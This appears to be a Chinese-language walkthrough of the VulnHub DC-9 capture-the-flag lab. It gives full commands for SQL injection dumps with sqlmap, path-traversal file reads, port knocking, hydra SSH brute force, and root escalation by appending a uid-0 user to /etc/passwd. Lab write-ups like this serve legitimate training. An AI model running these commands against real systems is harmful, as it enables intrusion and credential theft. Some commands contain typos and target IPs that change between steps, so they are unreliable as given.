靶机入侵——DC9
1、环境搭建
下载地址:http://www.vulnhub.com/entry/dc-9,412/
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
2、信息收集
-
主机发现
使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
192.168.80.138 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24 -
端口扫描
使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.137
发现开放了80、22端口 -
web端进一步信息收集
通过wappalyzer 插件我们收集到站点的中间件、语言等信息
3、漏洞挖掘与利用
-
在网站搜索页面发现存在SQL注入漏洞
-
抓包,使用sqlmap跑出网站用户名及密码
sqlmap -r .\request.txt --dbs --tamper=space2comment --leve 3
- 查看user数据库,发现一堆用户名和密码。尝试登录了一下后台发现登录不了,先收集起来。
- 继续查看staff数据库,这个应该是网站数据库
sqlmap -r .\request.txt -D Staff --tables --tamper=space2comment --leve 3
sqlmap -r .\request.txt -D Staff -T Users --columns --tamper=space2comment --leve 3
sqlmap -r .\request.txt -D Staff -T Users -C “Username,Password” --dump --tamper=space2comment --leve 3
-
登录后台
-
发现页面显示File does not exist 文件不存在,试下文件包含?file=…/…/…/…/etc/passwd
-
前面信息收集的时候,发现ssh服务端口22有防火墙,查了一下是开启了端口敲门服务,即:knockd服务。
-
需要按照指定顺序敲击端口,如果敲击的端口和顺序正确,防火墙会更改策略对该访问ip放行,来达到访问效果,访问下knockd配置文件?file=…/…/…/…/etc/knockd.conf
-
按照配置文件要求分别去敲击指定端口7469,8475,9842。开启ssh端口22为open 状态。
for x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.74.133;done
或者:
knock -v 192.168.139.208 7469 8475 9842
或:
for -x in 7469 8475 9842 ;do nc 192.168.139.208 $x;done
-
hydra爆破ssh服务,使用前面收集的users数据库中获得的用户名及信息作为字典爆破。
-
得到两个账户,尝试登录。收集有用信息
-
在janitor用户里面找到一些密码,加入到字典中,再次爆破
-
尝试登录fredf用户,看有没有什么突破点
sudo -l 查看免密使用root级命令时,发现一个脚本有root权限
4、权限提升
-
查看test
-
test.py是一个python脚本。它既然拥有root权限,那现在我们要做的就是构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限。
-
在kali使用openssl工具先创建一个本地的加密用户
openssl passwd -1 -salt admin 123456
-
在靶机/opt/devstuff/dist/test目录下面创建一个叫swn的文件(随便命名) 再使用sudo用那个test程序来运行这个文件,随后切换成我们添加的这个用户,输入自己设定的密码就可以成功提权到root用户了,最后进入root目录下查看flag即可。
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/swn sudo ./test /tmp/swn /etc/passwd su admin cd /root cat theflag.txt